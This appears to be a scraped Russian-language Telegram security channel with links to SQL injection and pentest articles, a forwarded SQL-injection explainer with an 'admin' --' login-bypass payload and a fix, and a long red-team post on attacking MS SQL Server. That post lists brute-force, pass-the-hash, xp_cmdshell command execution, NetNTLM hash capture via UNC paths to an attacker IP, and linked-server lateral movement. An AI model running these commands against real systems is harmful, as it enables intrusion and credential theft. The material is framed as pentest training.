Fsecurity | HH
2.06K subscribers
1.74K photos
105 videos
62 files
6.19K links
Канал про ИБ
Наш Discord: https://discord.gg/Eg8aDS7Hn7
Пожертвовать:
> https://www.donationalerts.com/r/xackapb
Download Telegram
😈 Обход WAF для выполнения продвинутой SQL инъекции на основе ошибок

Полный дамп базы данных и получения данных пользователей с помощью Error Based SQL и обхода защиты веб приложения.

https://telegra.ph/Obhod-WAF-dlya-vypolneniya-prodvinutoj-SQL-inekcii-na-osnove-oshibok-03-12

#Web #SQL | 💀 Этичный хакер
Please open Telegram to view this post
VIEW IN TELEGRAM
👍1
😈 SQLmap: пентест БД

В статье представлен полный гайд по тестированию на проникновение базы данных с помощью инструмента sqlmap.

https://telegra.ph/Testirovanie-na-proniknovenie-v-bazu-dannyh-s-ispolzovaniem-SQLmap-03-16

#Web #SQL
Please open Telegram to view this post
VIEW IN TELEGRAM
👍1
😈 SQLiFinder: программа на Python для поиска веб-сайтов, уязвимых для SQL-инъекции

Краткое руководство по использованию довольно новой программы, которая ищет уязвимые сайты по гугл-доркам.

https://telegra.ph/sqlifinder-python-06-18

#Web #SQL #Dork | 💀 Этичный хакер
Please open Telegram to view this post
VIEW IN TELEGRAM
Навигация

#SQL
#Linux
#OSINT
#SE
#Web
#XXS
#CSRF
#WAF
#Metasploit
#Python
#JavaScript
#HTML
#PHP

💬 Пошаговое руководство, как стать экспертом по кибербезопасности (на английском)

📶 База, основные понятия:
• Сетевая разведка (OSINT)
• Курс по SQL для начинающих
• EXIF - данные, метаданные
• TCP: что за протокол такой?
• DNS атака: как это работает
• Модели OSI - сетевые протоколы
• 4 главных навыка специалиста по информационной безопасности
• Что о вас знает интернет-провайдер?
• Топ 5 правил безопасности в интернете
• Burp Suite: вникаем в аудит безопасности
• Базовые инструменты для тестирования в Kali Linux

🔎 OSINT:
• Подборка дорков для более чем 10 известных сервисов
• Поиск в сети с помощью Maltego
• Offensive OSINT Tools
• Мануал по Maltego. Сбор информации
• Shodan и Censys: поиск скрытых деталей в Интернете
• Cканирование сайта с помощью Google дорков
• Mitaka - расширение браузера для OSINT
• CSI Linux. Убийца в мире пробива
• Blackbird - инструмент OSINT для поиска учетных записей
• EmailHarvester - инструмент для получения адресов электронной почты
• OSINT фреймворк для Github
• 20 практических приемов OSINT c применением новых возможностей цифрового мира
• Maltego: исследование веб-сайтов, хостинга и почт
• Поиск в сети с помощью Maltego
• Maltego: сканирование уязвимостей
• Maltego: исследование серверов, доменов и файлов
• Доксинг. Защити свои данные от деанона.
• DarkSide: сбор информации и соц. инженерия

🎂 Kali Linux:
• Kali Linux: Базовый инструментарий для пентеста
• Как взломать WPA / WPA2 WiFi с помощью Kali Linux?
• Инструменты для хакинга на Kali Linux

👁 Социальная инженерия:
• Основные приемы манипуляции в дискуссии
• 10 человеческих слабостей, которые помогут управлять людьми
• Исключительные методы взлома
• Аудит с использованием соц. инженерии

Пентест:
• Red Rabbit - Пентест и постэксплуатация
• Пентест сайта. 12 шагов.
• Подборка лабораторий для практики веб-пентеста
• Пентест Apache log4j
• Пентест сети IPv6
• Пентест: Wi-Fi с WPA паролем
• Rekono - автоматический пентест
• SQLmap: пентест БД
• Материалы по пентесту API
• Инструменты для хакинга на Kali Linux
• Подборка браузерных расширений для Bug Bounty и пентеста
• fsociety – платформа для тестирования на проникновение

OWASP Top 10:
• OWASP Top 10: A1 SQL - инъекции
• OWASP Top 10: A2 Сломанная аутентификация и управление сеансами
• OWASP Top 10: A3 Раскрытие конфиденциальных данных
• OWASP Top 10: A4 XXE Атака внешнего объекта XML
• OWASP Top 10: A5 Нарушенный контроль доступа
• OWASP Top 10: A6 Неправильная конфигурация безопасности
• OWASP Top 10: A7 Межсайтовый скриптинг (XSS)
• OWASP Top 10: A8 Небезопасная десериализация
• OWASP Top 10: A9 Использование компонентов с известными уязвимостями
• OWASP Top 10: A10 Недостаточное ведение журнала и мониторинг

• Подделка межсайтовых запросов (CSRF) – уязвимость OWASP
• OWASP. Методология тестирования безопасности веб-приложений
• Небольшая подборка плагинов для OWASP ZAP

😟 Анонимность:
• Создание левой личности
• Как удалить свой номер из GetContact
• Как удалить персональные данные из ботов пробива
• Реализация двойного дна на IOS и Android
• Комплексная проверка анонимности
• Конфиденциальность в криптовалютах
• Настройки безопасности: Отключаем слежку в Windows
• Как удалить персональные данные из ботов пробива
• Находим все аккаунты, связанные с вашей почтой
• Что Google знает о вас
• Одни из самых анонимных OC

Полезное:
• Путеводитель по тематическим форумам
• Как сделать собственный VPN на OpenVPN
• Находим чужие пароли в «Google»
• Ресурсы по информационной безопасности
• СОРМ: как ищут хакеров
• Как обойти регистрацию по номеру телефона в общественной Wi-Fi сети
• Установка Kali Linux в VirtualBox

Помимо всего прочего, в канале бесплатно публикуем различную литературу и руководства — #books
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from STEIN: ИБ, OSINT
💉 SQL-инъекция: что такое и с чем едят?

SQL-инъекция - это атака, которая может привести к компрометации конфиденциальных данных и даже полному захвату системы.

Разрабам и сисадминам важно знать об этой угрозе и принимать меры по ее предотвращению. Использование подготовленных инструкций с параметризованными запросами, проверка и очистка входных данных, а также регулярные проверки безопасности могут значительно снизить риск успешной атаки.

— Вот пример кода, уязвимого для SQL-инъекций:

<?php
$username = $_POST[“username”];
$password = $_POST[“password”];

$query = “SELECT * FROM users WHERE username = ‘$username’ AND password = ‘$password'”;
$result = mysqli_query($connection, $query);

if (mysqli_num_rows($result) > 0) {
// login successful
} else {
// login failed
}
?>

В этом примере PHP-скрипт пытается аутентифицировать пользователя, сверяя имя пользователя и пароль с записями в таблице «‎users»‎.

❗️ Проблема с этим кодом заключается в том, что он напрямую включает пользовательский ввод ($username и $password) в SQL-запрос без его надлежащей проверки или очистки. Это означает, что в случае инъекции в поля имени пользователя и пароля, он может привести к выполнению непреднамеренных команд.

👁 Например, можно ввести в поле username: admin' --, что привело бы к тому, что запрос стал бы:

SELECT * FROM users WHERE username = ‘admin’ –‘ AND password = ‘whatever_password_entered’

Этот запрос закомментировал бы остальную часть запроса, минуя проверку пароля, следовательно, атака прошла бы успешно.

— Чтобы устранить эту уязвимость, вводимые пользователем данные должны быть проверены и обработаны, а для построения SQL-запроса следует использовать инструкции с параметризованными запросами, выглядеть это будет примерно так:

$stmt = $connection->prepare(“SELECT * FROM users WHERE username = ? AND password = ?”);
$stmt->bind_param(“ss”, $username, $password);
$stmt->execute();b

Таким образом, он не будет выполнен как запрос и будет обрабатываться как строка, предотвращая атаки с использованием SQL-инъекций.

#SQL #Injection
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from APT
👩‍💻 Nagios XI — RCE

Nagios XI 2024R1.01 has a vulnerability in the monitoringwizard.php component, allowing authenticated SQL injection (CVE-2024-24401) that lets attackers create an admin account and remote code execution.

🔗 Source:
https://github.com/MAWK0235/CVE-2024-24401

#nagios #sql #rce #privesc #poc #exploit
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from REDtalk (closed_character)
🙂Привет, друзья!

На собеседованиях я часто спрашиваю про абьюз Microsoft SQL Server, и, к моему удивлению, многие знают о нём поверхностно. А ведь MSSQL широко используется в корпоративных сетях и при неправильной настройке может стать удобной точкой входа для атакующего.

В этом посте я постарался собрать основные техники абьюза MSSQL, которые помогут лучше понять возможные векторы атак, подготовиться к собеседованию и собрать ваши знания воедино.

📖 Немного теории

Microsoft SQL Server (MSSQL) — это реляционная СУБД от Microsoft, активно используемая в корпоративных сетях для хранения и обработки данных.

Основные компоненты:
🔹 Database Engine — отвечает за хранение, обработку и управление данными.
🔹 SQL Server Agent — автоматизация задач (например, резервное копирование).
🔹 SQL Server Browser — помогает клиентам находить MSSQL-инстансы.
🔹 SSIS (SQL Server Integration Services) — инструмент для интеграции данных.
🔹 SSRS (SQL Server Reporting Services) — генерация отчетов.
🔹 SSAS (SQL Server Analysis Services) — аналитика и обработка данных.

Основные роли в MSSQL:
🔹 sysadmin — полные привилегии на сервере.
🔹 db_owner — полные права в конкретной базе данных.
🔹 db_datareader — доступ только на чтение данных.
🔹 db_datawriter — возможность изменять данные.
🔹 public — назначается всем пользователям по умолчанию и может давать больше доступа, чем кажется.

Способы аутентификации:
🔹Windows Authentication — через доменную аутентификацию (NTLM/Kerberos).
🔹 SQL Authentication — локальные учетные записи MSSQL (sa, пользовательские логины).


Обнаружение MSSQL в сети

Прежде чем “что-то” ломать, нам это “что-то” надо найти.



#PowerUpSQL
Get-SQLInstanceDomain

#nmap
nmap -p 1433 --script ms-sql-info <IP>

#Metasploit
auxiliary/scanner/mssql/mssql_ping

#go-windapsearch
go-windapsearch -d domain.local -u Administrator -p 'password1111' -m custom --filter="(&(objectClass=computer)(servicePrincipalName=*MSSQLSvc/*))" --attrs cn,servicePrincipalName


🥰 Доступ к MSSQL



#brute force
hydra -L users.txt -P pass.txt <IP> mssql
netexec mssql <target-ip> -u username -p passwords.txt

#password spraying
netexec mssql example.com -u usernames.txt -p 'password' --no-bruteforce --continue-on-success

#Pass-the-Hash
netexec mssql example.com -u usernames.txt -H <NTLM_HASH> --continue-on-success

impacket-mssqlclient DOMAIN/user@IP -hashes <YourHash>


🤪 Повышение привилегий: от локального админа до sysadmin

Основной процесс SQL Server — это sqlservr.exe. Даже если у учетной записи SQL Server в Windows нет высоких привилегий, в самом SQL Server она по умолчанию получает роль sysadmin.

Компрометация службы SQL Server может привести к компрометации всего домена!

Шаг 1: Найдём локальный SQL Server.



# PowerUpSQL
Get-SQLInstanceLocal


Шаг 2: Получаем учетную запись SQL Server



#PowerUpSQL
Invoke-SQLImpersonateService -Verbose -Instance your_instance_name


🤗 Выполнение команд в OS через MSSQL

Злоумышленник, имея доступ к MSSQL, может выполнить команды Windows на сервере. Может он это сделать следующими способами:

🔹CLR (Common Language Runtime) Assembly — это механизм в Microsoft SQL Server, который позволяет выполнять .NET-код (C#, VB.NET, etc.) внутри базы данных.



#PowerUpSQL
Invoke-SQLOSCLR -Username sa -Password Pass123 -Instance your_instance_name -Command "whoami"


🔹OLE Automation Procedures — это механизм в Microsoft SQL Server, который позволяет запускать объекты COM (Component Object Model) напрямую из T-SQL.



#PowerUpSQL
Invoke-SQLOSOle -Username sa -Password Pass123 -ServerInstance <IP> -Command "whoami"


🔹xp_cmdshell - встроенная хранимая процедура в Microsoft SQL Server, которая позволяет выполнять команды Windows напрямую из T-SQL



#SQL Server CLI
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
EXEC xp_cmdshell 'whoami';

#PowerUpSQL
Invoke-SQLOSCmd -Username sa -Password sa -Instance your_instance_name -Command "whoami"
Please open Telegram to view this post
VIEW IN TELEGRAM
👍1
Forwarded from REDtalk (closed_character)
<продолжение>


🔹External Scripts (Python/R) - механизм в Microsoft SQL Server, который позволяет выполнять Python и R-код


#SQL Server CLI
EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(__import__("os").system("whoami"))

EXEC sp_execute_external_script
@language=N'R',
@script=N'OutputDataSet <- data.frame(system("cmd.exe /c whoami",intern=T))'
WITH RESULT SETS (([cmd_out] text));
GO

#PowerUpSQL
#REMOTE
Invoke-SQLOSCmdPython -Username sa -Password Pass123 -Instance your_instance_name -Command "whoami"

Invoke-SQLOSCmdR -Username sa -Password Pass123 -Instance your_instance_name -Command "whoami"

#LOCAL Instance
Get-SQLInstanceLocal | Invoke-SQLOSCmdPyrhon -Verbose -Command "whoami"

Get-SQLInstanceLocal | Invoke-SQLOSCmdR -Verbose -Command "whoami"


👅 UNC Path Injection

Позволяет утянуть NetNTLM-хеш через SMB


#SQL Server CLI
EXEC xp_cmdshell 'net use Z:\\YOUR_IP\share';

#PowerUpSQL
Invoke-SQLUncPathInjection -Verbose -CaptureIp YourResponderHost


🤪 Lateral Movement через Linked Servers

Linked Servers — это механизм в Microsoft SQL Server, который позволяет подключаться к другим SQL Server'ам или внешним базам данных (MySQL, Oracle, PostgreSQL, файловым источникам и т. д.)



#Просмотр связанных серверов
EXEC sp_linkedservers;

#Выполнение команды на удалённом сервере
EXEC ('whoami') AT [LINKED_SERVER];

#PowerUpSQL
#поиск связанных серверов
Get-SQLServerLink -Instance YourInstance -Verbose

#проверка прав на удаленном сервере
Get-SQLServerLinkCrawl -Instance YourInstance -Verbose

#включаем xp_cmdshell на linked сервере
Get-SQLServerLinkCrawl -Instance YourInstance -Query "EXEC ('EXEC sp_configure ''show advanced options'', 1; RECONFIGURE; EXEC sp_configure ''xp_cmdshell'', 1; RECONFIGURE;') AT YOUR_LINKED_SERVER"​


На этом всё, друзья! 🎯
Всем удачного хакинга и до новых встреч!

#redteam
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Ralf Hacker Channel (Ralf Hacker)
И еще один хороший материал подъехал пол часа назад)

В блоге рассматривается шифрование MSSQL Server и методы подбора ключей.

https://specterops.io/blog/2025/04/08/the-sql-server-crypto-detour/

Что еще прикольное узнали из блога: ManageEngine ADSelfService по умолчанию использует ключ, который Microsoft показывает в качестве примера в своей справке😁 прикол конечно...

#pentest #redteam #sql #ad